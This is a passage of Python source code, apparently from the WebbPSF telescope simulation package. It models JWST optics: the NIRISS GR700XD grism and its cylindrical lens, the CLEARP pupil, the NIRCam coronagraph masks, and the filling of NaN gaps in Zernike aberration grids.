minimize ghosts. Likely a 90 degrees rotation will be applied to baseline of point 2. From Michael.Maszkiewicz@asc-csa.gc.ca: As far as I understand now, we have two rotations in the as-built GR700. One rotation is for the prism-grism combo by 2 deg CCW, looking along the local +z axis, and the second rotation is for the mask by 3.05 deg but CW. As a result there is total 5.05 deg rotation between grism and its mask. See my annotations to your drawing attached. From Loic Albert's email to Marshall 2014-05-20: I should have pointed that the power assumed in my simulations for the cylindrical lens was off. It was one of the conclusions of CV1RR. The actual radius of curvature of the cylinder is 25.3 meters (rather than the smaller figure I used before). ORIENTATION: See Figure 2 of JWST-STScI-003338 In "DMS" coordinates, as projected looking outwards onto the sky, The GR700XD grating trace is near the extreme right edge of the detector with long wavelengths closest to (2048,2048) and short wavelengths nearest (2048,0) (The raw detector coordinates are very different from this due to a 180 degree rotation) **PLEASE NOTE** that the DMS when processing spectral data performs an additional transformation: For spectral data, the science X-axis is aligned with the detector dispersion direction and the science frame Y-axis is at a right angle to the X-axis in a right-handed coordinate system (Swade 2003) We choose here to ignore that complication; WebbPSF simulates the 2D sky projected image in "Sci" coordinates in the terminology for SIAF from Lallo et al. In this coordinate system, the dispersion from the cylinder lens is aligned almost along V2 and the longer wavelengths are oriented toward +V3. Parameters ---------- which : string 'initial' or 'spare'. Properties are hard coded. """ # # transmission : string filename # file for the pupil transmission function # cylinder_sag_mm : float # physical thickness of the cylindrical lens, in millimeters # rotation_angle : float # degrees clockwise for the orientation of the cylinder's dispersing axis. Default # of 92.25 should be consistent with initial NIRISS girsm and spare, except for # sign ambiguity. # rotate_mask : bool # should the field mask be rotated along with the cylinder? False for first gen initial # prism, true for expected spare replacement. def __init__(self, name='GR700XD', which='Bach', # cylinder_radius=22.85, cylinder_sag_mm=4.0, rotation_angle=92.25, rotate_mask=False, transmission=None, **kwargs): # Initialize the base optical element with the pupil transmission and zero OPD if which == 'LLNL': raise NotImplementedError("Rotated field mask for LLNL grism not yet implemented!") elif which == 'Bach': transmission = os.path.join(utils.get_webbpsf_data_path(), "NIRISS/optics/MASKGR700XD.fits.gz") else: raise NotImplementedError("Unknown grating name:" + which) poppy.AnalyticOpticalElement.__init__(self, name=name, planetype=poppy.poppy_core._PUPIL, **kwargs) # UPDATED NUMBERS 2013-07: # See Document FGS_TFI_UdM_035_RevD _log.debug("Computing properties for {0} grism".format(which)) if which == 'Bach': # ---- Phase properties --------------- # 3.994 microns P-V over 27.02 mm measured (Loic's email) # This is **surface sag**, corresponding to P-V of 6.311 waves at lambda=632.8 nm. # should correspond to 3.698 microns over 26 mm clear aperture. self.prism_size = 0.02702 # 27.02 millimeters for the physical prism self.prism_clear_aperture = 0.0260 # 26 mm clear aperture for the prism + mount self.cylinder_rotation_angle = 2 # was 2.25 # self.cylinder_radius = 22.85 # radius of curvature ; Nominal # but they discarded that and used 25.3 instead # From Lafreniere's wfe_cylindricallens.pro: # "OVERRIDE PREVIOUS CASES AFTER CV1RR RESULTS:" self.cylinder_radius = 25.3 # radius of curvature # ---- Amplitude Transmission / Pupil shape --------------- self.pupil_size_mm = 26.0 # Note that the IDL code says 26 mm is 683.75 pixels using the assumed demagnification self.pupil_rotation_angle = 2.0 else: # 5.8 microns P-V over 32.15 mm (Loic's email) # should correspond to 4.38 microns over 28 mm clear aperture self.cylinder_radius = 22.39 # radius of curvature self.prism_size = 0.03215 # millimeters for the physical prism self.prism_clear_aperture = 0.0280 # clear aperture for the prism + mount self.cylinder_rotation_angle = 2.25 # We need to know the magnification scale of the NIRISS reimaged pupil # in order to compute the curvature in the full-pupil units that POPPY uses # internally # pupil magnification computed from 22 mm clear aperture reported = # 857-169 pixels = 699 pixels in the 2D array which has scale =.00645604 # = 4.44175 meters projected on the primary # 2014-05-21 but wait, that's actually 26 mm! # so the 699 pixels at 0.00645604 m/pixel = 4.512 meters implies the magnificationa 173 not 170 # but, double wait, it's actually more like 687 pixels across rather than 699 so that makes it 170 again. # therefore the magnification is 0.1708 meters projected on the primary / mm in the NIRISS pupil # self.pupil_demagnification = 170.8367 # meters on the primary / meters in the NIRISS pupil # self.pupil_demagnification = 173.56 # meters on the primary / meters in the NIRISS pupil # Anand says: # nominally the circumscribing circle at the PW of NIRISS is ~40mm. I use 39mm for the nrm, but it's slightly field-dependent. Compare that to the 6.6... PM circle? self.pupil_demagnification = 6.6 / 0.040 # about 165 # perform an initial population of the OPD array for display etc. tmp = self.get_phasor(poppy.Wavefront(2e-6)) def get_opd(self, wave): """ Make an OPD array corresponding to the cylindrical weak lens used for defocusing the spectrum in the perpendicular-to-dispersion direction. Parameters ---------- wave : float or obj either a scalar wavelength (meters) or a Wavefront object """ # wave should be a Wavefront object # wavelength is an astropy.units type if isinstance(wave, poppy.Wavefront): wavelength = wave.wavelength else: wave = poppy.Wavefront(wavelength=float(wave)) wavelength = wave.wavelength # compute indices in pixels, relative to center of plane, with rotation # units of these are meters y, x = wave.coordinates() ang = np.deg2rad(self.cylinder_rotation_angle) x = np.cos(ang) * x - np.sin(ang) * y y = np.sin(ang) * x + np.cos(ang) * y _log.debug(" Rotating local grism axes by {0} degrees".format(self.cylinder_rotation_angle)) # From IDL code by David Lafreniere: # ;the cylindrical defocus # x=(dindgen(pupdim)-pupdim/2)#replicate(1,pupdim) # y0=(rpuppix^2+sag[s]^2)/(2*sag[s]) # wfe1=y0-sqrt(y0^2-x^2) # if sag[s] lt 1.e-5 then wfe1=0.d0 # Here I will just translate that to Python exactly, making use of the # variables here: # rpuppix = radius of pupil in pixels # rpuppix = self.amplitude_header['DIAM'] / self.amplitude_header['PUPLSCAL'] / 2 # Calculate the radius of curvature of the cylinder, bsaed on # the chord length and height # In this case we're assuming the cylinder is precisely as wide as the projected # telescope pupil. This doesn't seem guaranteed: # * actual chord length across cylinder: 27.02 mm. # * projected primary scale at NIRISS = ? _log.debug(" Computing GR700XD cylinder based on RoC: {0:.3g} meters".format(self.cylinder_radius)) _log.debug( " Computing GR700XD cylinder based on pupil demagnification: {0:.3g} primary to grism".format(self.pupil_demagnification)) # Compute the overall sag of the cylinder lens at its outer edge. This is not actually used, it's # just for cross-check of the values # the sag will depend on half the pupil size since that's the offset from center to edge sag0 = np.sqrt(self.cylinder_radius ** 2 - (self.prism_size / 2) ** 2) - self.cylinder_radius _log.debug(" Computed GR700XD cylinder sag at lens outer edge (for cross check only): {0:.3g} meters".format(sag0)) # now compute the spatially dependent sag of the cylinder, as projected onto the primary # what is the pupil scale at the *reimaged pupil* of the grism? pupil_scale_m_per_pix = 38.0255e-6 # Based on UdeM info in wfe_cylindricallens.pro # sag = np.sqrt(self.cylinder_radius**2 - (x*self.amplitude_header['PUPLSCAL']/self.pupil_demagnification)**2) - self.cylinder_radius sag = np.sqrt(self.cylinder_radius ** 2 - (x / self.pupil_demagnification) ** 2) - self.cylinder_radius # sag = self.cylinder_radius - np.sqrt(self.cylinder_radius**2 - (x * pupil_scale_m_per_pix )**2 ) # what we really want to do is take the physical properties of the as-built optic, and interpolate into that # to compute the OPD after remapping based on the pupil scale (and distortion?) # y0=(rpuppix**2+self.cylinder_sag**2)/(2*self.cylinder_sag) # wfe1=y0-np.sqrt(y0**2-x**2) _log.debug(" Cylinder P-V: {0:.4g} meters physical sag across full array".format(sag.max() - sag.min())) # no OPD in opaque regions (makes no difference in propagation but improves display) if self._transmission.shape != sag.shape: tmp = self.get_transmission() # Update the ._transmission attribute sag[self._transmission == 0] = 0 wnz = np.where(self._transmission != 0) # use this just for display of the log messages: _log.debug(" Cylinder P-V: {0:.4g} meters physical sag across clear aperture".format(sag[wnz].max() - sag[wnz].min())) # scale for index of refraction index = self.ZnS_index(wavelength) opd = sag * (index - 1) lambda_micron = wavelength.to(units.micron).value _log.debug(" Scaling for ZnS index of refraction {0} at {1:.3g} microns".format(index, lambda_micron)) _log.debug( " Cylinder P-V: {0:.4g} meters optical sag at {1:.3g} microns across clear aperture".format(opd[wnz].max() - opd[wnz].min(), lambda_micron)) return opd def get_transmission(self, wave): """ Make array for the pupil obscuration appropriate to the grism """ if isinstance(wave, poppy.Wavefront): wavelength = wave.wavelength else: wave = poppy.Wavefront(wavelength=float(wave)) wavelength = wave.wavelength y, x = wave.coordinates() ang = np.deg2rad(self.pupil_rotation_angle) x = np.cos(ang) * x - np.sin(ang) * y y = np.sin(ang) * x + np.cos(ang) * y _log.debug("Rotating local pupil mask axes by {0} degrees".format(self.cylinder_rotation_angle)) pupil_halfsize_m = self.pupil_size_mm / 2 / 1000 * self.pupil_demagnification pupilmask = np.ones_like(x) pupilmask[np.abs(x) > pupil_halfsize_m] = 0 pupilmask[np.abs(y) > pupil_halfsize_m] = 0 self._transmission = pupilmask return pupilmask @poppy.utils.quantity_input(wavelength=units.meter) def ZnS_index(self, wavelength, temperature=40): """ Return cryogenic index of refraction of ZnS (Cleartran) Based on IDL function index_cleartran provided by Loic Albert at U de Montreal Which was in turn based on Leviton and Fray 2013 http://proceedings.spiedigitallibrary.org/proceeding.aspx?articleid=1744938 doi:10.1117/12.2024817 """ lambda_micron = wavelength.to(units.micron).value # Sellmeier dispersion model # From Leviton & Frey measurements (SPIE preprint) (assumes lambda in microns) S_1 = np.asarray([[3.35933, -5.12262e-4, 1.01086e-5, -4.14798e-8, 6.91051e-11]]) S_2 = np.asarray([[0.706131, 4.89603e-4, -8.91159e-6, 3.81621e-8, -6.54805e-11]]) S_3 = np.asarray([[4.02154, -2.93193e-2, 2.31080e-4, -7.57289e-07, 8.31188e-10]]) S_ij = np.concatenate((S_1, S_2, S_3), axis=0) lambda_1 = np.array([[0.161151, -8.93057E-06, 2.73286E-07, -1.23408E-09, 2.29917E-12]]) lambda_2 = np.array([[0.282427, -4.66636E-05, 7.55906E-07, -2.77513E-09, 4.35237E-12]]) lambda_3 = np.array([[41.1590, -0.161010, 1.23906E-03, -3.95895E-06, 4.16370E-09]]) lambda_ij = np.concatenate((lambda_1, lambda_2, lambda_3)) n2minus1 = 0.0 T = temperature for i in range(3): S_i = S_ij[i, 0] + S_ij[i, 1] * T + S_ij[i, 2] * T ** 2.0 + S_ij[i, 3] * T ** 3.0 + S_ij[i, 4] * T ** 4.0 lambda_i = lambda_ij[i, 0] + lambda_ij[i, 1] * T + lambda_ij[i, 2] * T ** 2.0 + lambda_ij[i, 3] * T ** 3.0 + lambda_ij[ i, 4] * T ** 4.0 n2minus1 += S_i * lambda_micron ** 2.0 / (lambda_micron ** 2.0 - lambda_i ** 2.0) cleartran_index = np.sqrt(1.0 + n2minus1) return cleartran_index def display(self, opd_vmax=6e-6, *args, **kwargs): "Same as regular display for any other optical element, except opd_vmax default changed" poppy.AnalyticOpticalElement.display(self, *args, opd_vmax=opd_vmax, **kwargs) class NIRISS_CLEARP(poppy.CompoundAnalyticOptic): """NIRISS 'CLEARP' pupil, including PAR obscuration **CAUTIONARY NOTE** TODO: This class represents this optic as having a circular outer edge; in reality the hardware has a 4% oversized tricontagon mask around the JWST pupil image. However as the primary mirror should serve as the pupil stop, in practice this model simplification should not affect output PSFs in imaging modes. This simplification may be removed in a future version of WebbPSF. See https://github.com/mperrin/webbpsf/issues/71 CLEARP pupil info from: MODIFIED CALIBRATION OPTIC HOLDER - NIRISS DRAWING NO 196847 REV 0 COMDEV Design file name 196847Rev0.pdf sent by Loic Albert Properties: 39 mm outer diam, corresponds to the circumscribing pupil of JWST 2.0 mm vane width 6.0 mm radius for central obstruction Note the circumscribing pupil of JWST is 6603.464 mm in diameter (Ball SER on geometric optics model: BALL-JWST-SYST-05-003) and therefore the NIRISS pupil magnification is 6.603464/39.0 = 0.1693 meters (JWST primary) per mm (NIRISS internal pupil) Pupil distortions are not included in this model. """ def __init__(self, *args, **kwargs): # CLEARP pupil info from: # MODIFIED CALIBRATION OPTIC HOLDER - NIRISS # DRAWING NO 196847 REV 0 COMDEV # Design file name 196847Rev0.pdf sent by Loic Albert # Properties: # 39 mm outer diam, corresponds to the circumscribing pupil of JWST # 2.0 mm vane width # 6.0 mm radius for central obstruction # Note the circumscribing pupil of JWST is 6603.464 mm in diameter # (Ball SER on geometric optics model: BALL-JWST-SYST-05-003) pupil_mag = 6.603464 / 39.0 poppy.CompoundAnalyticOptic.__init__(self, ( poppy.SecondaryObscuration(secondary_radius=6.0 * pupil_mag, support_width=2.0 * pupil_mag, n_supports=3, support_angle_offset=90 + 180, # align first support with +V2 axis # but invert to match OTE exit pupil *args, **kwargs), poppy.CircularAperture(radius=39 * pupil_mag / 2, *args, **kwargs)), name='CLEARP') class NIRCam_BandLimitedCoron(poppy.BandLimitedCoron): """ Band Limited Coronagraph Paramaters ---------- name : string Descriptive name. Must be one of the defined NIRCam coronagraphic mask names. module : string A or B nd_squares : bool Include the ND squares in the mask simulation? (Not an option in the real instrument; solely for certain simulation checks.) bar_offset : float Offset along coronagraphic bar (wedge) occulter, in arcseconds. Used for computing a PSF at a different position along the wedge, while keeping the convention that the target star has zero tip/tilt. This option is used to MANUALLY specify a specific position along the bar; see also the following option auto_offset. auto_offset : string or None Set to a NIRCam filter name to automatically offset to the nominal position along the bar for that filter. See bar_offset if you want to set to some arbitrary position. shift_x, shift_y : floats or None X and Y offset shifts applied to the occulter, via the standard mechanism for poppy.AnalyticOpticalElements. Like bar_offset but allows for 2D offets, and applies to both bar and wedge coronagraphs. This is IN ADDITION TO any offset from bar_offset. """ allowable_kinds = ['nircamcircular', 'nircamwedge'] """ Allowable types of BLC supported by this class""" def __init__(self, name="unnamed BLC", kind='nircamcircular', module='A', nd_squares=True, bar_offset=None, auto_offset=None, **kwargs): super(NIRCam_BandLimitedCoron, self).__init__(name=name, kind=kind, **kwargs) if module not in ['A', 'B']: raise ValueError("module parameter must be 'A' or 'B'.") self.module = module self.nd_squares = nd_squares if self.name == 'MASK210R': self.sigma = 5.253 self.kind = 'nircamcircular' elif self.name == 'MASK335R': self.sigma = 3.2927866 self.kind = 'nircamcircular' elif self.name == 'MASK430R': self.sigma = 2.58832 self.kind = 'nircamcircular' elif self.name == 'MASKSWB': self.kind = 'nircamwedge' # coeffs set in lookup table inside getPhasor elif self.name == 'MASKLWB': self.kind = 'nircamwedge' # coeffs set in lookup table inside getPhasor else: raise NotImplementedError("invalid name for NIRCam occulter: " + self.name) # EDIT: updated on 8 Dec 2021 to grab offsets directly from pySIAF self.siaf = pysiaf.Siaf('NIRCAM') self.offset_swb = {filt: self.get_bar_offset_from_siaf(filt, channel='SW') for filt in ["F182M", "F187N", "F210M", "F212N", "F200W", 'narrow']} self.offset_lwb = {filt: self.get_bar_offset_from_siaf(filt, channel='LW') for filt in ["F250M", "F300M", "F277W", "F335M", "F360M", "F356W", "F410M", "F430M", "F460M", "F480M", "F444W", 'narrow']} if bar_offset is None and auto_offset is not None: offsets = self.offset_swb if self.name.lower() == 'maskswb' else self.offset_lwb try: bar_offset = offsets[auto_offset] _log.debug("Set bar offset to {} based on requested filter {} on {}.".format(bar_offset, auto_offset, self.name)) except: raise ValueError("Filter {} does not have a defined nominal offset position along {}".format(auto_offset, self.name)) if bar_offset is not None: if self.kind == 'nircamcircular': raise ValueError("bar_offset option only makes sense with the bar occulters.") self.bar_offset = float(bar_offset) _log.debug("Set offset along {} to {} arcsec.".format(self.name, self.bar_offset)) else: self.bar_offset = None def get_bar_offset_from_siaf(self, filt, channel='LW'): """ Get bar offset directly from SIAF. """ if channel == 'SW': refapername = 'NRCA4_MASKSWB' apername = 'NRCA4_MASKSWB_' + filt.upper() else: # otherwise default to LW refapername = 'NRCA5_MASKLWB' apername = 'NRCA5_MASKLWB_' + filt.upper() offset_arcsec = np.sqrt((self.siaf.apertures[refapername].V2Ref - self.siaf.apertures[apername].V2Ref)**2 + (self.siaf.apertures[refapername].V3Ref - self.siaf.apertures[apername].V3Ref)**2) sign = np.sign(self.siaf.apertures[refapername].V2Ref - self.siaf.apertures[apername].V2Ref) return sign * offset_arcsec def get_transmission(self, wave): """ Compute the amplitude transmission appropriate for a BLC for some given pixel spacing corresponding to the supplied Wavefront. Based on the Krist et al. SPIE paper on NIRCam coronagraph design Note that the equations in Krist et al specify the intensity transmission of the occulter, but what we want to return here is the amplitude transmittance. That is the square root of the intensity, of course, so the equations as implemented here all differ from those written in Krist's SPIE paper by lacking an exponential factor of 2. Thanks to John Krist for pointing this out. """ import scipy.special if not isinstance(wave, poppy.Wavefront): # pragma: no cover raise ValueError("BLC getPhasor must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = self.get_coordinates(wave) if self.bar_offset is not None: x += float(self.bar_offset) if self.kind == 'nircamcircular': r = poppy.accel_math._r(x, y) sigmar = self.sigma * r # clip sigma: The minimum is to avoid divide by zero # the maximum truncates after the first sidelobe to match the hardware bessel_j1_zero2 = scipy.special.jn_zeros(1, 2)[1] sigmar.clip(np.finfo(sigmar.dtype).tiny, bessel_j1_zero2, out=sigmar) # avoid divide by zero -> NaNs if poppy.accel_math._USE_NUMEXPR: import numexpr as ne jn1 = scipy.special.j1(sigmar) self.transmission = ne.evaluate("(1 - (2 * jn1 / sigmar) ** 2)") else: self.transmission = (1 - (2 * scipy.special.j1(sigmar) / sigmar) ** 2) self.transmission[r == 0] = 0 # special case center point (value based on L'Hopital's rule) elif self.kind == 'nircamwedge': # This is hard-coded to the wedge-plus-flat-regions shape for NIRCAM # the scale fact should depend on X coord in arcsec, scaling across a 20 arcsec FOV. # map flat regions to 2.5 arcsec each # map -7.5 to 2, +7.5 to 6. slope is 4/15, offset is +9.5 wedgesign = 1 if self.name == 'MASKSWB' else -1 # wide ends opposite for SW and LW scalefact = (2 + (x * wedgesign + 7.5) * 4 / 15).clip(2, 6) # Working out the sigma parameter vs. wavelength to get that wedge pattern is non trivial # This is NOT a linear relationship. See calc_blc_wedge helper fn below. if self.name == 'MASKSWB': # np.abs(self.wavelength - 2.1e-6) < 0.1e-6: polyfitcoeffs = np.array([2.01210737e-04, -7.18758337e-03, 1.12381516e-01, -1.00877701e+00, 5.72538509e+00, -2.12943497e+01, 5.18745152e+01, -7.97815606e+01, 7.02728734e+01]) elif self.name == 'MASKLWB': # elif np.abs(self.wavelength - 4.6e-6) < 0.1e-6: polyfitcoeffs = np.array([9.16195583e-05, -3.27354831e-03, 5.11960734e-02, -4.59674047e-01, 2.60963397e+00, -9.70881273e+00, 2.36585911e+01, -3.63978587e+01, 3.20703511e+01]) else: raise NotImplementedError("invalid name for NIRCam wedge occulter") sigmas = scipy.poly1d(polyfitcoeffs)(scalefact) sigmar = sigmas * np.abs(y) # clip sigma: The minimum is to avoid divide by zero # the maximum truncates after the first sidelobe to match the hardware sigmar.clip(min=np.finfo(sigmar.dtype).tiny, max=2 * np.pi, out=sigmar) self.transmission = (1 - (np.sin(sigmar) / sigmar) ** 2) self.transmission[y == 0] = 0 # special case center point (value based on L'Hopital's rule) # the bar should truncate at +- 10 arcsec: woutside = np.where(np.abs(x) > 10) self.transmission[woutside] = 1.0 if self.nd_squares: # add in the ND squares. Note the positions are not exactly the same in the two wedges. # See the figures in Krist et al. of how the 6 ND squares are spaced among the 5 # corongraph regions # Note: 180 deg rotation needed relative to Krist's figures for the flight SCI orientation: if ((self.module == 'A' and self.name == 'MASKLWB') or (self.module == 'B' and self.name == 'MASK210R')): # left edge: # has one fully in the corner and one half in the other corner, half outside the 10x10 box wnd_5 = np.where( ((y < -5) & (y > -10)) & ( ((x > 5) & (x < 10)) | ((x < -7.5) & (x > -12.5)) ) ) wnd_2 = np.where( ((y < 10) & (y > 8)) & ( ((x > 8) & (x < 10)) | ((x < -9) & (x > -11)) ) ) elif ((self.module == 'A' and self.name == 'MASK210R') or (self.module == 'B' and self.name == 'MASKSWB')): # right edge wnd_5 = np.where( ((y < -5) & (y > -10)) & ( ((x < 12.5) & (x > 7.5)) | ((x < -5) & (x > -10)) ) ) wnd_2 = np.where( ((y < 10) & (y > 8)) & ( ((x < 11) & (x > 9)) | ((x < -8) & (x > -10)) ) ) else: # the others have two, one in each corner, both halfway out of the 10x10 box. wnd_5 = np.where( ((y < -5) & (y > -10)) & (np.abs(x) > 7.5) & (np.abs(x) < 12.5) ) wnd_2 = np.where( ((y < 10) & (y > 8)) & (np.abs(x) > 9) & (np.abs(x) < 11) ) self.transmission[wnd_5] = np.sqrt(1e-3) self.transmission[wnd_2] = np.sqrt(1e-3) # Add in the opaque border of the coronagraph mask holder. if ((self.module == 'A' and self.name == 'MASKLWB') or (self.module == 'B' and self.name == 'MASK210R')): # left edge woutside = np.where((x > 10) & (y > -11.5)) self.transmission[woutside] = 0.0 elif ((self.module == 'A' and self.name == 'MASK210R') or (self.module == 'B' and self.name == 'MASKSWB')): # right edge woutside = np.where((x < -10) & (y > -11.5)) self.transmission[woutside] = 0.0 # mask holder edge woutside = np.where(y > 10) self.transmission[woutside] = 0.0 # edge of mask itself # TODO the mask edge is complex and partially opaque based on CV3 images? # edge of glass plate rather than opaque mask I believe. To do later. # The following is just a temporary placeholder with no quantitative accuracy. # but this is outside the coronagraph FOV so that's fine - this only would matter in # modeling atypical/nonstandard calibration exposures. wedge = np.where((y < -11.5) & (y > -13)) self.transmission[wedge] = 0.7 if not np.isfinite(self.transmission.sum()): # stop() _log.warn("There are NaNs in the BLC mask - correcting to zero. (DEBUG LATER?)") self.transmission[np.where(np.isfinite(self.transmission) == False)] = 0 return self.transmission def display(self, annotate=False, annotate_color='cyan', annotate_text_color=None, grid_size=20, *args, **kwargs): """Same as regular display for any other optical element, except adds annotate option for the LWB offsets """ poppy.AnalyticOpticalElement.display(self, grid_size=grid_size, *args, **kwargs) if annotate: shift_dx = getattr(self, 'shift_x', 0) - getattr(self, 'bar_offset', 0) shift_dy = getattr(self, 'shift_y', 0) if annotate_text_color is None: annotate_text_color = annotate_color if self.name.lower() == 'maskswb' or self.name.lower() == 'masklwb': offset = self.offset_swb if self.name.lower() == 'maskswb' else self.offset_lwb for filt, offset in offset.items(): if 'W' in filt: horiz, vert, voffset = 'right', 'top', -0.5 else: horiz, vert, voffset = 'left', 'bottom', +0.5 matplotlib.pyplot.plot(offset + shift_dx, shift_dy, marker='+', color=annotate_color, clip_on=True) matplotlib.pyplot.text(offset + shift_dx, voffset + shift_dy, filt, color=annotate_text_color, rotation=75, horizontalalignment=horiz, verticalalignment=vert, clip_on=True) ax = matplotlib.pyplot.gca() # Fix the axis scaling if any of the overplots exceeded it ax.set_xlim(-grid_size / 2, grid_size / 2) ax.set_ylim(-grid_size / 2, grid_size / 2) # Helper functions for NIRcam occulters. # The following are no longer used in practice, but were used to derive the # table of polynomial coefficients that is now hard-coded inside # the NIRCam_BandLimitedCoron case for the nircam wedge occulters. def _width_blc(desired_width, approx=None, plot=False): """ The calculation of sigma parameters for the wedge BLC function is not straightforward. This function numerically solves the relevant equation to determine the sigma required to acheive a given HWHM. It uses recursion to iterate to a higher precision level. """ loc = desired_width if approx is None: sigma = np.linspace(0, 20, 5000) else: sigma = np.linspace(approx * 0.9, approx * 1.1, 100000.) lhs = loc * np.sqrt(1 - np.sqrt(0.5)) rhs = np.sin(sigma * loc) / sigma diff = np.abs(lhs - rhs) wmin = np.where(diff == np.nanmin(diff)) sig_ans = sigma[wmin][0] if approx: return sig_ans else: # use recursion sig_ans = _width_blc(loc, sig_ans) if plot: check = (1 - (np.sin(sig_ans * loc) / sig_ans / loc) ** 2) ** 2 # plt.plot(sigma, lhs) plt.clf() plt.plot(sigma, rhs) plt.axhline(lhs) print("sigma = %f implies HWHM = %f" % (sig_ans, loc)) print(" check: 0.5 == %f" % (check)) return sig_ans def _calc_blc_wedge(deg=4, wavelength=2.1e-6): """ This function determines the desired sigma coefficients required to achieve a wedge from 2 to 6 lam/D. It returns the coefficients of a polynomial fit that maps from nlambda/D to sigma. """ import scipy r = np.linspace(2, 6, 161) difflim = wavelength / 6.5 * 180. * 60 * 60 / np.pi sigs = [_width_blc(difflim * ri) for ri in r] pcs = scipy.polyfit(r, sigs, deg) p = scipy.poly1d(pcs) plt.plot(r, sigs, 'b') plt.plot(r, p(r), "r--") diffs = (sigs - p(r)) print("Poly fit:" + repr(pcs)) print(" fit rms: " + str(diffs.std())) def _trim_nan_image(xgrid, ygrid, zgrid): """NaN Trimming of Image Remove rows/cols with NaN's while trying to preserve the maximum footprint of real data. """ xgrid2, ygrid2, zgrid2 = xgrid, ygrid, zgrid # Create a mask of NaN'ed values nan_mask = np.isnan(zgrid2) nrows, ncols = nan_mask.shape # Determine number of NaN's along each row and col num_nans_cols = nan_mask.sum(axis=0) num_nans_rows = nan_mask.sum(axis=1) # First, crop all rows/cols that are only NaN's xind_good = np.where(num_nans_cols < nrows)[0] yind_good = np.where(num_nans_rows < ncols)[0] # get border limits x1, x2 = (xind_good.min(), xind_good.max()+1) y1, y2 = (yind_good.min(), yind_good.max()+1) # Trim of NaN borders xgrid2 = xgrid2[x1:x2] ygrid2 = ygrid2[y1:y2] zgrid2 = zgrid2[y1:y2,x1:x2] # Find a optimal rectangule subsection free of NaN's # Iterative cropping ndiff = 5 while np.isnan(zgrid2.sum()): # Make sure ndiff is not negative if ndiff<0: break npix = zgrid2.size # Create a mask of NaN'ed values nan_mask = np.isnan(zgrid2) nrows, ncols = nan_mask.shape # Determine number of NaN's along each row and col num_nans_cols = nan_mask.sum(axis=0) num_nans_rows = nan_mask.sum(axis=1) # Look for any appreciable diff row-to-row/col-to-col col_diff = num_nans_cols - np.roll(num_nans_cols,-1) row_diff = num_nans_rows - np.roll(num_nans_rows,-1) # For edge wrapping, just use last minus previous col_diff[-1] = col_diff[-2] row_diff[-1] = row_diff[-2] # Keep rows/cols composed mostly of real data # and where number of NaN's don't change dramatically xind_good = np.where( ( np.abs(col_diff) <= ndiff ) & ( num_nans_cols < 0.5*nrows ) )[0] yind_good = np.where( ( np.abs(row_diff) <= ndiff ) & ( num_nans_rows < 0.5*ncols ) )[0] # get border limits x1, x2 = (xind_good.min(), xind_good.max()+1) y1, y2 = (yind_good.min(), yind_good.max()+1) # Trim of NaN borders xgrid2 = xgrid2[x1:x2] ygrid2 = ygrid2[y1:y2] zgrid2 = zgrid2[y1:y2,x1:x2] # Check for convergence # If we've converged, reduce if npix==zgrid2.size: ndiff -= 1 # Last ditch effort in case there are still NaNs # If so, remove rows/cols 1 by 1 until no NaNs while np.isnan(zgrid2.sum()): xgrid2 = xgrid2[1:-1] ygrid2 = ygrid2[1:-1] zgrid2 = zgrid2[1:-1,1:-1] return xgrid2, ygrid2, zgrid2 def _fix_zgrid_NaNs(xgrid, ygrid, zgrid, rot_ang=0): """Fix NaN's in Zernike Grid We trim NaN's within `zgrid`, then generate an extrapolation function using `RegularGridInterpolator`. A rotation angle can also be specified to maximize the number of remaining data points due to irregular polygons of the real `zgrid` data. Returns `zgrid` with the NaN's fixed using the extrapolation function. Parameter ========= xgrid : ndarray 1D V2 regular grid information ygrid : ndarray 1D V3 regular grid information zgrid : ndarray 2D Zernike grid rot_ang : float Option to rotate grid data for more optimal trimming of NaN's. """ # Rotate zgrid if rot_ang != 0: zgrid = rotate(zgrid, rot_ang, reshape=False, order=1, cval=np.nan) # There will be some NaN's along the border that need to be replaced ind_nan = np.isnan(zgrid) # Remove rows/cols with NaN's xgrid2, ygrid2, zgrid2 = _trim_nan_image(xgrid, ygrid, zgrid) # Create regular grid interpolator function for extrapolation of NaN's func = RegularGridInterpolator((ygrid2,xgrid2), zgrid2, method='linear', bounds_error=False, fill_value=None) # Replace NaNs X, Y = np.meshgrid(xgrid,ygrid) pts = np.array([Y[ind_nan], X[ind_nan]]).transpose() zgrid[ind_nan] = func(pts) # De-rotate clipped zgrid image and redo RegularGridInterpolator if rot_ang != 0: # De-rotate zgrid = rotate(zgrid, -rot_ang, reshape=False, order=1, cval=np.nan) # There will be some NaNs along the border that need to be replaced ind_nan = np.isnan(zgrid) # Remove rows/cols 1 by 1 until no NaNs xgrid2, ygrid2, zgrid2 = _trim_nan_image(xgrid, ygrid, zgrid) # Create regular grid interpolator function for extrapolation of NaN's func = RegularGridInterpolator((ygrid2,xgrid2), zgrid2, method='linear', bounds_error=False, fill_value=None) # Replace NaNs pts = np.array([Y[ind_nan], X[ind_nan]]).transpose() zgrid[ind_nan] = func(pts) return zgrid def _get_initial_pupil_sampling(instrument): """Utility function to retrieve the sampling of the first plane in some optical system. Returns: npix, pixelscale """ # Determine the pupil sampling of the first aperture in the # instrument's optical system if isinstance(instrument.pupil, poppy.OpticalElement): # This branch needed to handle the OTE Linear Model case npix = instrument.pupil.shape[0] pixelscale = instrument.pupil.pixelscale else: # these branches to handle FITS files, by name or as an object if isinstance(instrument.pupil, fits.HDUList): pupilheader = instrument.pupil[0].header else: pupilfile = os.path.join(instrument._datapath, "OPD", instrument.pupil) pupilheader = fits.getheader(pupilfile) npix = pupilheader['NAXIS1'] pixelscale = pupilheader['PUPLSCAL'] * units.meter / units.pixel return npix, pixelscale # Field dependent aberration class for JWST instruments class WebbFieldDependentAberration(poppy.OpticalElement): """ Field dependent aberration generated from Zernikes measured in ISIM CV testing Parameters ----------- include_oversize : bool Explicitly model the 4% oversize for pupil tolerance """ def __init__(self, instrument, include_oversize=False, **kwargs): super(WebbFieldDependentAberration, self).__init__( name="Aberrations", **kwargs ) self.instrument = instrument self.instr_name = instrument.name # work out which name to index into the CV results with, if for NIRCam is_nrc_coron = False # Define NRC coronagraph variable for conciseness if instrument.name == 'NIRCam': channel = instrument.channel[0].upper() lookup_name = "NIRCam{channel}W{module}".format( channel=channel, module=instrument.module ) # Check for coronagraphy; Set is_ncr_coron to True for Lyot pupil mask pupil_mask = self.instrument._pupil_mask is_nrc_coron = (pupil_mask is not None) and ( ('LYOT' in pupil_mask.upper()) or ('MASK' in pupil_mask.upper()) ) elif instrument.name == 'FGS': # 'GUIDER1' or 'GUIDER2' assert instrument.detector in ('FGS1', 'FGS2') lookup_name 